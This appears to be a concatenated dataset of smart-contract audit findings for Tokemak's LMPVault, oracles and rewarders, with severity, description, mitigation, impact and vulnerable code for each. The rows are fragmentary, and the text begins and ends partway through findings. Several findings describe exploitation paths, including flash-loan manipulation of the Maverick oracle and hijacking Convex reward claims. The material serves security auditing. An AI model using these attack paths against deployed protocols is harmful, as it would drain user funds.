Consider updating $totalAssets_{cached}$ to $totalAssets_{actual}$ before any withdrawal or deposit to mitigate this issue.
Loss assets for vault shareholders. Attacker gains are the loss of other vault shareholders.
```\\nFile: LMPVault.sol\\n function totalAssets() public view override returns (uint256) {\\n return totalIdle + totalDebt;\\n }\\n```\\n
Incorrect pricing for CurveV2 LP Token
high
Using the Curve rETH/frxETH pool (0xe7c6e0a739021cdba7aac21b4b728779eef974d9) to illustrate the issue:\\nThe price of the LP token of Curve rETH/frxETH pool can be obtained via the following `lp_price` function:\\n```\\ndef lp_price() -> uint256:\\n """\\n Approximate LP token price\\n """\\n return 2 * self.virtual_price * self.sqrt_int(self.internal_price_oracle()) / 10**18\\n```\\n\\nThus, the formula to obtain the price of the LP token is as follows:\\n$$ price_{LP} = 2 \\times virtualPrice \\times \\sqrt{internalPriceOracle} $$\\n```\\ndef price_oracle() -> uint256:\\n return self.internal_price_oracle()\\n```\\n\\nThe $internalPriceOracle$ is the price of coins[1](frxETH) with coins[0](rETH) as the quote currency, which means how many rETH (quote) are needed to purchase one frxETH (base).\\n$$ base/quote \\ frxETH/rETH $$\\nDuring pool registration, the `poolInfo.tokenToPrice` is always set to the second coin (coins[1]) as per Line 131 below. In this example, `poolInfo.tokenToPrice` will be set to frxETH token address (coins[1]).\\n```\\nFile: CurveV2CryptoEthOracle.sol\\n function registerPool(address curvePool, address curveLpToken, bool checkReentrancy) external onlyOwner {\\n..SNIP..\\n /**\\n * Curve V2 pools always price second token in `coins` array in first token in `coins` array. This means that\\n * if `coins[0]` is Weth, and `coins[1]` is rEth, the price will be rEth as base and weth as quote. Hence\\n * to get lp price we will always want to use the second token in the array, priced in eth.\\n */\\n lpTokenToPool[lpToken] =\\n PoolData({ pool: curvePool, checkReentrancy: checkReentrancy ? 1 : 0, tokenToPrice: tokens[1] });\\n```\\n\\nNote that `assetPrice` variable below is equivalent to $internalPriceOracle$ in the above formula.\\nWhen fetching the price of the LP token, Line 166 computes the price of frxETH with ETH as the quote currency ($frxETH/ETH$) via the `getPriceInEth` function, and assigns to the `assetPrice` variable.\\nHowever, the $internalPriceOracle$ or `assetPrice` should be $frxETH/rETH$ instead of $frxETH/ETH$. Thus, the price of the LP token computed will be incorrect.\\n```\\nFile: CurveV2CryptoEthOracle.sol\\n function getPriceInEth(address token) external returns (uint256 price) {\\n Errors.verifyNotZero(token, "token");\\n\\n PoolData memory poolInfo = lpTokenToPool[token];\\n if (poolInfo.pool == address(0)) revert NotRegistered(token);\\n\\n ICryptoSwapPool cryptoPool = ICryptoSwapPool(poolInfo.pool);\\n\\n // Checking for read only reentrancy scenario.\\n if (poolInfo.checkReentrancy == 1) {\\n // This will fail in a reentrancy situation.\\n cryptoPool.claim_admin_fees();\\n }\\n\\n uint256 virtualPrice = cryptoPool.get_virtual_price();\\n uint256 assetPrice = systemRegistry.rootPriceOracle().getPriceInEth(poolInfo.tokenToPrice);\\n\\n return (2 * virtualPrice * sqrt(assetPrice)) / 10 ** 18;\\n }\\n```\\n
Issue Incorrect pricing for CurveV2 LP Token\\nUpdate the `getPriceInEth` function to ensure that the $internalPriceOracle$ or `assetPrice` return the price of `coins[1]` with `coins[0]` as the quote currency.
The protocol relies on the oracle to provide accurate pricing for many critical operations, such as determining the debt values of DV, calculators/stats used during the rebalancing process, NAV/shares of the LMPVault, and determining how much assets the users should receive during withdrawal.\\nIncorrect pricing of LP tokens would result in many implications that lead to a loss of assets, such as users withdrawing more or fewer assets than expected due to over/undervalued vaults or strategy allowing an unprofitable rebalance to be executed.
```\\ndef lp_price() -> uint256:\\n """\\n Approximate LP token price\\n """\\n return 2 * self.virtual_price * self.sqrt_int(self.internal_price_oracle()) / 10**18\\n```\\n
Incorrect number of shares minted as fee
high
```\\nFile: LMPVault.sol\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n```\\n\\nAssume that the following states:\\nThe `profit` is 100 WETH\\nThe fee is 20%, so the `fees` will be 20 WETH.\\n`totalSupply` is 100 shares and `totalAssets()` is 1000 WETH\\nLet the number of shares to be minted be $shares2mint$. The current implementation uses the following formula (simplified) to determine $shares2mint$.\\n$$ \\begin{align} shares2mint &= fees \\times \\frac{totalSupply}{totalAsset()} \\ &= 20\\ WETH \\times \\frac{100\\ shares}{1000\\ WETH} \\ &= 2\\ shares \\end{align} $$\\nIn this case, two (2) shares will be minted to the `sink` address as the fee is taken.\\nHowever, the above formula used in the codebase is incorrect. The total cost/value of the newly-minted shares does not correspond to the fee taken. Immediately after the mint, the value of the two (2) shares is worth only 19.60 WETH, which does not correspond to the 20 WETH fee that the `sink` address is entitled to.\\n$$ \\begin{align} value &= 2\\ shares \\times \\frac{1000\\ WETH}{100 + 2\\ shares} \\ &= 2\\ shares \\times 9.8039\\ WETH\\ &= 19.6078\\ WETH \\end{align} $$
The correct formula to compute the number of shares minted as fee should be as follows:\\n$$ \\begin{align} shares2mint &= \\frac{profit \\times performanceFeeBps \\times totalSupply}{(totalAsset() \\times MAX_FEE_BPS) - (performanceFeeBps \\times profit) } \\ &= \\frac{100\\epsilon \\times 2000 \\times 100 shares}{(1000\\epsilon \\times 10000) - (2000 \\times 100\\epsilon)} \\ &= 2.0408163265306122448979591836735\\ shares \\end{align} $$\\nThe following is the proof to show that `2.0408163265306122448979591836735` shares are worth 20 WETH after the mint.\\n$$ \\begin{align} value &= 2.0408163265306122448979591836735\\ shares \\times \\frac{1000\\ WETH}{100 + 2.0408163265306122448979591836735\\ shares} \\ &= 2.0408163265306122448979591836735\\ shares \\times 9.8039\\ WETH\\ &= 20\\ WETH \\end{align} $$
Loss of fee. Fee collection is an integral part of the protocol; thus the loss of fee is considered a High issue.
```\\nFile: LMPVault.sol\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n```\\n
Maverick oracle can be manipulated
high
In the MavEthOracle contract, `getPriceInEth` function utilizes the reserves of the Maverick pool and multiplies them with the external prices of the tokens (obtained from the rootPriceOracle contract) to calculate the total value of the Maverick position.\\n```\\n// Get reserves in boosted position.\\n(uint256 reserveTokenA, uint256 reserveTokenB) = boostedPosition.getReserves();\\n\\n// Get total supply of lp tokens from boosted position.\\nuint256 boostedPositionTotalSupply = boostedPosition.totalSupply();\\n\\nIRootPriceOracle rootPriceOracle = systemRegistry.rootPriceOracle();\\n\\n// Price pool tokens.\\nuint256 priceInEthTokenA = rootPriceOracle.getPriceInEth(address(pool.tokenA()));\\nuint256 priceInEthTokenB = rootPriceOracle.getPriceInEth(address(pool.tokenB()));\\n\\n// Calculate total value of each token in boosted position.\\nuint256 totalBoostedPositionValueTokenA = reserveTokenA * priceInEthTokenA;\\nuint256 totalBoostedPositionValueTokenB = reserveTokenB * priceInEthTokenB;\\n\\n// Return price of lp token in boosted position.\\nreturn (totalBoostedPositionValueTokenA + totalBoostedPositionValueTokenB) / boostedPositionTotalSupply;\\n```\\n\\nHowever, the reserves of a Maverick position can fluctuate when the price of the Maverick pool changes. Therefore, the returned price of this function can be manipulated by swapping a significant amount of tokens into the Maverick pool. An attacker can utilize a flash loan to initiate a swap, thereby changing the price either upwards or downwards, and subsequently swapping back to repay the flash loan.\\nAttacker can decrease the returned price of MavEthOracle by swapping a large amount of the higher value token for the lower value token, and vice versa.\\nHere is a test file that demonstrates how the price of the MavEthOracle contract can be manipulated by swapping to change the reserves.
Use another calculation for Maverick oracle
There are multiple impacts that an attacker can exploit by manipulating the price of MavEthOracle:\\nDecreasing the oracle price to lower the totalDebt of LMPVault, in order to receive more LMPVault shares.\\nIncreasing the oracle price to raise the totalDebt of LMPVault, in order to receive more withdrawn tokens.\\nManipulating the results of the Stats contracts to cause miscalculations for the protocol.
```\\n// Get reserves in boosted position.\\n(uint256 reserveTokenA, uint256 reserveTokenB) = boostedPosition.getReserves();\\n\\n// Get total supply of lp tokens from boosted position.\\nuint256 boostedPositionTotalSupply = boostedPosition.totalSupply();\\n\\nIRootPriceOracle rootPriceOracle = systemRegistry.rootPriceOracle();\\n\\n// Price pool tokens.\\nuint256 priceInEthTokenA = rootPriceOracle.getPriceInEth(address(pool.tokenA()));\\nuint256 priceInEthTokenB = rootPriceOracle.getPriceInEth(address(pool.tokenB()));\\n\\n// Calculate total value of each token in boosted position.\\nuint256 totalBoostedPositionValueTokenA = reserveTokenA * priceInEthTokenA;\\nuint256 totalBoostedPositionValueTokenB = reserveTokenB * priceInEthTokenB;\\n\\n// Return price of lp token in boosted position.\\nreturn (totalBoostedPositionValueTokenA + totalBoostedPositionValueTokenB) / boostedPositionTotalSupply;\\n```\\n
Aura/Convex rewards are stuck after DOS
high
Anyone can claim Convex rewards for any account.\\n```\\nfunction getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\\n uint256 reward = earned(_account);\\n if (reward > 0) {\\n rewards[_account] = 0;\\n rewardToken.safeTransfer(_account, reward);\\n IDeposit(operator).rewardClaimed(pid, _account, reward);\\n emit RewardPaid(_account, reward);\\n }\\n\\n //also get rewards from linked rewards\\n if(_claimExtras){\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).getReward(_account);\\n }\\n }\\n return true;\\n}\\n```\\n\\nIn ConvexRewardsAdapter, the rewards are accounted for by using balanceBefore/after.\\n```\\nfunction _claimRewards(\\n address gauge,\\n address defaultToken,\\n address sendTo\\n) internal returns (uint256[] memory amounts, address[] memory tokens) {\\n\\n uint256[] memory balancesBefore = new uint256[](totalLength);\\n uint256[] memory amountsClaimed = new uint256[](totalLength);\\n// rest of code\\n\\n for (uint256 i = 0; i < totalLength; ++i) {\\n uint256 balance = 0;\\n // Same check for "stash tokens"\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balance = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n\\n amountsClaimed[i] = balance - balancesBefore[i];\\n\\n return (amountsClaimed, rewardTokens);\\n```\\n\\nAdversary can call the external convex contract's `getReward(tokemakContract)`. After this, the reward tokens are transferred to Tokemak without an accounting hook.\\nNow, when Tokemak calls claimRewards, then no new rewards are transferred, because the attacker already transferred them. `amountsClaimed` will be 0.
Don't use balanceBefore/After. You could consider using `balanceOf(address(this))` after claiming to see the full amount of tokens in the contract. This assumes that only the specific rewards balance is in the contract.
Rewards are stuck in the LiquidationRow contract and not queued to the MainRewarder.
```\\nfunction getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\\n uint256 reward = earned(_account);\\n if (reward > 0) {\\n rewards[_account] = 0;\\n rewardToken.safeTransfer(_account, reward);\\n IDeposit(operator).rewardClaimed(pid, _account, reward);\\n emit RewardPaid(_account, reward);\\n }\\n\\n //also get rewards from linked rewards\\n if(_claimExtras){\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).getReward(_account);\\n }\\n }\\n return true;\\n}\\n```\\n
`LMPVault._withdraw()` can revert due to an arithmetic underflow
medium
Inside the `_withdraw()` function, the `maxAssetsToPull` argument value of `_calcUserWithdrawSharesToBurn()` is calculated to be equal to `info.totalAssetsToPull - Math.max(info.debtDecrease, info.totalAssetsPulled)`. However, the `_withdraw()` function only halts its loop when `info.totalAssetsPulled >= info.totalAssetsToPull`. This can lead to a situation where `info.debtDecrease >= info.totalAssetsToPull`. Consequently, when calculating `info.totalAssetsToPull - Math.max(info.debtDecrease, info.totalAssetsPulled)` for the next destination vault in the loop, an underflow occurs and triggers a contract revert.\\nTo illustrate this vulnerability, consider the following scenario:\\n```\\n function test_revert_underflow() public {\\n _accessController.grantRole(Roles.SOLVER_ROLE, address(this));\\n _accessController.grantRole(Roles.LMP_FEE_SETTER_ROLE, address(this));\\n\\n // User is going to deposit 1500 asset\\n _asset.mint(address(this), 1500);\\n _asset.approve(address(_lmpVault), 1500);\\n _lmpVault.deposit(1500, address(this));\\n\\n // Deployed 700 asset to DV1\\n _underlyerOne.mint(address(this), 700);\\n _underlyerOne.approve(address(_lmpVault), 700);\\n _lmpVault.rebalance(\\n address(_destVaultOne),\\n address(_underlyerOne), // tokenIn\\n 700,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 700\\n );\\n\\n // Deploy 600 asset to DV2\\n _underlyerTwo.mint(address(this), 600);\\n _underlyerTwo.approve(address(_lmpVault), 600);\\n _lmpVault.rebalance(\\n address(_destVaultTwo),\\n address(_underlyerTwo), // tokenIn\\n 600,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 600\\n );\\n\\n // Deployed 200 asset to DV3\\n _underlyerThree.mint(address(this), 200);\\n _underlyerThree.approve(address(_lmpVault), 200);\\n _lmpVault.rebalance(\\n address(_destVaultThree),\\n address(_underlyerThree), // tokenIn\\n 200,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 200\\n );\\n\\n // Drop the price of DV2 to 70% of original, so that 600 we transferred out is now only worth 420\\n _mockRootPrice(address(_underlyerTwo), 7e17);\\n\\n // Revert because of an arithmetic underflow\\n vm.expectRevert();\\n uint256 assets = _lmpVault.redeem(1000, address(this), address(this));\\n }\\n```\\n
Issue `LMPVault._withdraw()` can revert due to an arithmetic underflow\\nTo mitigate this vulnerability, it is recommended to break the loop within the `_withdraw()` function if `Math.max(info.debtDecrease, info.totalAssetsPulled) >= info.totalAssetsToPull`\\n```\\n if (\\n Math.max(info.debtDecrease, info.totalAssetsPulled) >\\n info.totalAssetsToPull\\n ) {\\n info.idleIncrease =\\n Math.max(info.debtDecrease, info.totalAssetsPulled) -\\n info.totalAssetsToPull;\\n if (info.totalAssetsPulled >= info.debtDecrease) {\\n info.totalAssetsPulled = info.totalAssetsToPull;\\n }\\n break;\\n }\\n\\n // No need to keep going if we have the amount we're looking for\\n // Any overage is accounted for above. Anything lower and we need to keep going\\n // slither-disable-next-line incorrect-equality\\n if (\\n Math.max(info.debtDecrease, info.totalAssetsPulled) ==\\n info.totalAssetsToPull\\n ) {\\n break;\\n }\\n```\\n
The vulnerability can result in the contract reverting due to an underflow, disrupting the functionality of the contract. Users who try to withdraw assets from the LMPVault may encounter transaction failures and be unable to withdraw their assets.
```\\n function test_revert_underflow() public {\\n _accessController.grantRole(Roles.SOLVER_ROLE, address(this));\\n _accessController.grantRole(Roles.LMP_FEE_SETTER_ROLE, address(this));\\n\\n // User is going to deposit 1500 asset\\n _asset.mint(address(this), 1500);\\n _asset.approve(address(_lmpVault), 1500);\\n _lmpVault.deposit(1500, address(this));\\n\\n // Deployed 700 asset to DV1\\n _underlyerOne.mint(address(this), 700);\\n _underlyerOne.approve(address(_lmpVault), 700);\\n _lmpVault.rebalance(\\n address(_destVaultOne),\\n address(_underlyerOne), // tokenIn\\n 700,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 700\\n );\\n\\n // Deploy 600 asset to DV2\\n _underlyerTwo.mint(address(this), 600);\\n _underlyerTwo.approve(address(_lmpVault), 600);\\n _lmpVault.rebalance(\\n address(_destVaultTwo),\\n address(_underlyerTwo), // tokenIn\\n 600,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 600\\n );\\n\\n // Deployed 200 asset to DV3\\n _underlyerThree.mint(address(this), 200);\\n _underlyerThree.approve(address(_lmpVault), 200);\\n _lmpVault.rebalance(\\n address(_destVaultThree),\\n address(_underlyerThree), // tokenIn\\n 200,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 200\\n );\\n\\n // Drop the price of DV2 to 70% of original, so that 600 we transferred out is now only worth 420\\n _mockRootPrice(address(_underlyerTwo), 7e17);\\n\\n // Revert because of an arithmetic underflow\\n vm.expectRevert();\\n uint256 assets = _lmpVault.redeem(1000, address(this), address(this));\\n }\\n```\\n
Unable to withdraw extra rewards
medium
Suppose Bob only has 9999 Wei TOKE tokens as main rewards and 100e18 DAI as extra rewards in this account.\\nWhen attempting to get the rewards, the code will always get the main rewards, followed by the extra rewards, as shown below.\\n```\\nFile: MainRewarder.sol\\n function _processRewards(address account, bool claimExtras) internal {\\n _getReward(account);\\n\\n //also get rewards from linked rewards\\n if (claimExtras) {\\n for (uint256 i = 0; i < extraRewards.length; ++i) {\\n IExtraRewarder(extraRewards[i]).getReward(account);\\n }\\n }\\n }\\n```\\n\\nIf the main reward is TOKE, they will be staked to the `GPToke` at Line 376 below.\\n```\\nFile: AbstractRewarder.sol\\n function _getReward(address account) internal {\\n Errors.verifyNotZero(account, "account");\\n\\n uint256 reward = earned(account);\\n (IGPToke gpToke, address tokeAddress) = (systemRegistry.gpToke(), address(systemRegistry.toke()));\\n\\n // slither-disable-next-line incorrect-equality\\n if (reward == 0) return;\\n\\n rewards[account] = 0;\\n emit RewardPaid(account, reward);\\n\\n // if NOT toke, or staking is turned off (by duration = 0), just send reward back\\n if (rewardToken != tokeAddress || tokeLockDuration == 0) {\\n IERC20(rewardToken).safeTransfer(account, reward);\\n } else {\\n // authorize gpToke to get our reward Toke\\n // slither-disable-next-line unused-return\\n IERC20(address(tokeAddress)).approve(address(gpToke), reward);\\n\\n // stake Toke\\n gpToke.stake(reward, tokeLockDuration, account);\\n }\\n }\\n```\\n\\nHowever, if the staked amount is less than the minimum stake amount (MIN_STAKE_AMOUNT), the function will revert.\\n```\\nFile: GPToke.sol\\n uint256 public constant MIN_STAKE_AMOUNT = 10_000;\\n..SNIP..\\n function _stake(uint256 amount, uint256 duration, address to) internal whenNotPaused {\\n //\\n // validation checks\\n //\\n if (to == address(0)) revert ZeroAddress();\\n if (amount < MIN_STAKE_AMOUNT) revert StakingAmountInsufficient();\\n if (amount > MAX_STAKE_AMOUNT) revert StakingAmountExceeded();\\n```\\n\\nIn this case, Bob will not be able to redeem his 100 DAI reward when processing the reward. The code will always attempt to stake 9999 Wei Toke and revert because it fails to meet the minimum stake amount.
To remediate the issue, consider collecting TOKE and staking it to the `GPToke` contract only if it meets the minimum stake amount.\\n```\\nfunction _getReward(address account) internal {\\n Errors.verifyNotZero(account, "account");\\n\\n uint256 reward = earned(account);\\n (IGPToke gpToke, address tokeAddress) = (systemRegistry.gpToke(), address(systemRegistry.toke()));\\n\\n // slither// Remove the line below\\ndisable// Remove the line below\\nnext// Remove the line below\\nline incorrect// Remove the line below\\nequality\\n if (reward == 0) return;\\n\\n// Remove the line below\\n rewards[account] = 0;\\n// Remove the line below\\n emit RewardPaid(account, reward);\\n\\n // if NOT toke, or staking is turned off (by duration = 0), just send reward back\\n if (rewardToken != tokeAddress || tokeLockDuration == 0) {\\n// Add the line below\\n rewards[account] = 0;\\n// Add the line below\\n emit RewardPaid(account, reward);\\n IERC20(rewardToken).safeTransfer(account, reward);\\n } else {\\n// Add the line below\\n if (reward >= MIN_STAKE_AMOUNT) {\\n// Add the line below\\n rewards[account] = 0;\\n// Add the line below\\n emit RewardPaid(account, reward);\\n// Add the line below\\n\\n // authorize gpToke to get our reward Toke\\n // slither// Remove the line below\\ndisable// Remove the line below\\nnext// Remove the line below\\nline unused// Remove the line below\\nreturn\\n IERC20(address(tokeAddress)).approve(address(gpToke), reward);\\n\\n // stake Toke\\n gpToke.stake(reward, tokeLockDuration, account);\\n// Add the line below\\n }\\n }\\n}\\n```\\n
There is no guarantee that the users' TOKE rewards will always be larger than `MIN_STAKE_AMOUNT` as it depends on various factors such as the following:\\nThe number of vault shares they hold. If they hold little shares, their TOKE reward will be insignificant\\nIf their holding in the vault is small compared to the others and the entire vault, the TOKE reward they received will be insignificant\\nThe timing they join the vault. If they join after the reward is distributed, they will not be entitled to it.\\nAs such, the affected users will not be able to withdraw their extra rewards, and they will be stuck in the contract.
```\\nFile: MainRewarder.sol\\n function _processRewards(address account, bool claimExtras) internal {\\n _getReward(account);\\n\\n //also get rewards from linked rewards\\n if (claimExtras) {\\n for (uint256 i = 0; i < extraRewards.length; ++i) {\\n IExtraRewarder(extraRewards[i]).getReward(account);\\n }\\n }\\n }\\n```\\n
Malicious or compromised admin of certain LSTs could manipulate the price
medium
Important Per the contest detail page, admins of the external protocols are marked as "Restricted" (Not Trusted). This means that any potential issues arising from the external protocol's admin actions (maliciously or accidentally) are considered valid in the context of this audit.\\nQ: Are the admins of the protocols your contracts integrate with (if any) TRUSTED or RESTRICTED?\\nRESTRICTED\\nNote This issue also applies to other support Liquid Staking Tokens (LSTs) where the admin could upgrade the token contract code. Those examples are omitted for brevity, as the write-up and mitigation are the same and would duplicate this issue.\\nPer the contest detail page, the protocol will hold and interact with the Swell ETH (swETH).\\nLiquid Staking Tokens\\nswETH: 0xf951E335afb289353dc249e82926178EaC7DEd78\\nUpon inspection of the swETH on-chain contract, it was found that it is a Transparent Upgradeable Proxy. This means that the admin of Swell protocol could upgrade the contracts.\\nTokemak relies on the `swEth.swETHToETHRate()` function to determine the price of the swETH LST within the protocol. Thus, a malicious or compromised admin of Swell could upgrade the contract to have the `swETHToETHRate` function return an extremely high to manipulate the total values of the vaults, resulting in users being able to withdraw more assets than expected, thus draining the LMPVault.\\n```\\nFile: SwEthEthOracle.sol\\n function getPriceInEth(address token) external view returns (uint256 price) {\\n // Prevents incorrect config at root level.\\n if (token != address(swEth)) revert Errors.InvalidToken(token);\\n\\n // Returns in 1e18 precision.\\n price = swEth.swETHToETHRate();\\n }\\n```\\n
The protocol team should be aware of the above-mentioned risks and consider implementing additional controls to reduce the risks.\\nReview each of the supported LSTs and determine how much power the Liquid staking protocol team/admin has over its tokens.\\nFor LSTs that are more centralized (e.g., Liquid staking protocol team could update the token contracts or have the ability to update the exchange rate/price to an arbitrary value without any limit), those LSTs should be subjected to additional controls or monitoring, such as implementing some form of circuit breakers if the price deviates beyond a reasonable percentage to reduce the negative impact to Tokemak if it happens.
Loss of assets in the scenario as described above.
```\\nFile: SwEthEthOracle.sol\\n function getPriceInEth(address token) external view returns (uint256 price) {\\n // Prevents incorrect config at root level.\\n if (token != address(swEth)) revert Errors.InvalidToken(token);\\n\\n // Returns in 1e18 precision.\\n price = swEth.swETHToETHRate();\\n }\\n```\\n
`previewRedeem` and `redeem` functions deviate from the ERC4626 specification
medium
Important The contest page explicitly mentioned that the `LMPVault` must conform with the ERC4626. Thus, issues related to EIP compliance should be considered valid in the context of this audit.\\nQ: Is the code/contract expected to comply with any EIPs? Are there specific assumptions around adhering to those EIPs that Watsons should be aware of?\\nsrc/vault/LMPVault.sol should be 4626 compatible\\nLet the value returned by `previewRedeem` function be $asset_{preview}$ and the actual number of assets obtained from calling the `redeem` function be $asset_{actual}$.\\nThe following specification of `previewRedeem` function is taken from ERC4626 specification:\\nAllows an on-chain or off-chain user to simulate the effects of their redeemption at the current block, given current on-chain conditions.\\nMUST return as close to and no more than the exact amount of `assets` that would be withdrawn in a `redeem` call in the same transaction. I.e. `redeem` should return the same or more `assets` as `previewRedeem` if called in the same transaction.\\nIt mentioned that the `redeem` should return the same or more `assets` as `previewRedeem` if called in the same transaction, which means that it must always be $asset_{preview} \\le asset_{actual}$.\\nHowever, it is possible that the `redeem` function might return fewer assets than the number of assets previewed by the `previewRedeem` ($asset_{preview} > asset_{actual}$), thus it does not conform to the specification.\\n```\\nFile: LMPVault.sol\\n function redeem(\\n uint256 shares,\\n address receiver,\\n address owner\\n ) public virtual override nonReentrant noNavDecrease ensureNoNavOps returns (uint256 assets) {\\n uint256 maxShares = maxRedeem(owner);\\n if (shares > maxShares) {\\n revert ERC4626ExceededMaxRedeem(owner, shares, maxShares);\\n }\\n uint256 possibleAssets = previewRedeem(shares); // @audit-info round down, which is correct because user won't get too many\\n\\n assets = _withdraw(possibleAssets, shares, receiver, owner);\\n }\\n```\\n\\nNote that the `previewRedeem` function performs its computation based on the cached `totalDebt` and `totalIdle`, which might not have been updated to reflect the actual on-chain market condition. Thus, these cached values might be higher than expected.\\nAssume that `totalIdle` is zero and all WETH has been invested in the destination vaults. Thus, `totalAssetsToPull` will be set to $asset_{preview}$.\\nIf a DV is making a loss, users could only burn an amount proportional to their ownership of this vault. The code will go through all the DVs in the withdrawal queue (withdrawalQueueLength) in an attempt to withdraw as many assets as possible. However, it is possible that the `totalAssetsPulled` to be less than $asset_{preview}$.\\n```\\nFile: LMPVault.sol\\n function _withdraw(\\n uint256 assets,\\n uint256 shares,\\n address receiver,\\n address owner\\n ) internal virtual returns (uint256) {\\n uint256 idle = totalIdle;\\n WithdrawInfo memory info = WithdrawInfo({\\n currentIdle: idle,\\n assetsFromIdle: assets >= idle ? idle : assets,\\n totalAssetsToPull: assets - (assets >= idle ? idle : assets),\\n totalAssetsPulled: 0,\\n idleIncrease: 0,\\n debtDecrease: 0\\n });\\n\\n // If not enough funds in idle, then pull what we need from destinations\\n if (info.totalAssetsToPull > 0) {\\n uint256 totalVaultShares = totalSupply();\\n\\n // Using pre-set withdrawalQueue for withdrawal order to help minimize user gas\\n uint256 withdrawalQueueLength = withdrawalQueue.length;\\n for (uint256 i = 0; i < withdrawalQueueLength; ++i) {\\n IDestinationVault destVault = IDestinationVault(withdrawalQueue[i]);\\n (uint256 sharesToBurn, uint256 totalDebtBurn) = _calcUserWithdrawSharesToBurn(\\n destVault,\\n shares,\\n info.totalAssetsToPull - Math.max(info.debtDecrease, info.totalAssetsPulled),\\n totalVaultShares\\n );\\n..SNIP..\\n // At this point should have all the funds we need sitting in in the vault\\n uint256 returnedAssets = info.assetsFromIdle + info.totalAssetsPulled;\\n```\\n
Ensure that $asset_{preview} \\le asset_{actual}$.\\nAlternatively, document that the `previewRedeem` and `redeem` functions deviate from the ERC4626 specification in the comments and/or documentation.
It was understood from the protocol team that they anticipate external parties to integrate directly with the LMPVault (e.g., vault shares as collateral). Thus, the LMPVault must be ERC4626 compliance. Otherwise, the caller (internal or external) of the `previewRedeem` function might receive incorrect information, leading to the wrong action being executed.
```\\nFile: LMPVault.sol\\n function redeem(\\n uint256 shares,\\n address receiver,\\n address owner\\n ) public virtual override nonReentrant noNavDecrease ensureNoNavOps returns (uint256 assets) {\\n uint256 maxShares = maxRedeem(owner);\\n if (shares > maxShares) {\\n revert ERC4626ExceededMaxRedeem(owner, shares, maxShares);\\n }\\n uint256 possibleAssets = previewRedeem(shares); // @audit-info round down, which is correct because user won't get too many\\n\\n assets = _withdraw(possibleAssets, shares, receiver, owner);\\n }\\n```\\n
Malicious users could lock in the NAV/Share of the DV to cause the loss of fees
medium
The `_collectFees` function only collects fees whenever the NAV/Share exceeds the last NAV/Share.\\nDuring initialization, the `navPerShareHighMark` is set to `1`, effectively `1` ETH per share (1:1 ratio). Assume the following:\\nIt is at the early stage, and only a few shares (0.5 shares) were minted in the LMPVault\\nThere is a sudden increase in the price of an LP token in a certain DV (Temporarily)\\n`performanceFeeBps` is 10%\\nIn this case, the debt value of DV's shares will increase, which will cause LMPVault's debt to increase. This event caused the `currentNavPerShare` to increase to `1.4` temporarily.\\nSomeone calls the permissionless `updateDebtReporting` function. Thus, the profit will be `0.4 ETH * 0.5 Shares = 0.2 ETH`, which is small due to the number of shares (0.5 shares) in the LMPVault at this point. The fee will be `0.02 ETH` (~40 USD). Thus, the fee earned is very little and almost negligible.\\nAt the end of the function, the `navPerShareHighMark` will be set to `1.4`, and the highest NAV/Share will be locked forever. After some time, the price of the LP tokens fell back to its expected price range, and the `currentNavPerShare` fell to around `1.05`. No fee will be collected from this point onwards unless the NAV/Share is raised above `1.4`.\\nIt might take a long time to reach the `1.4` threshold, or in the worst case, the spike is temporary, and it will never reach `1.4` again. So, when the NAV/Share of the LMPVault is 1.0 to `1.4`, the protocol only collects `0.02 ETH` (~40 USD), which is too little.\\n```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // Set our new high water mark, the last nav/share height we took fees\\n navPerShareHighMark = currentNavPerShare;\\n navPerShareHighMarkTimestamp = block.timestamp;\\n emit NewNavHighWatermark(currentNavPerShare, block.timestamp);\\n }\\n emit FeeCollected(fees, sink, shares, profit, idle, debt);\\n}\\n```\\n
Issue Malicious users could lock in the NAV/Share of the DV to cause the loss of fees\\nConsider implementing a sophisticated off-chain algorithm to determine the right time to lock the `navPerShareHighMark` and/or restrict the access to the `updateDebtReporting` function to only protocol-owned addresses.
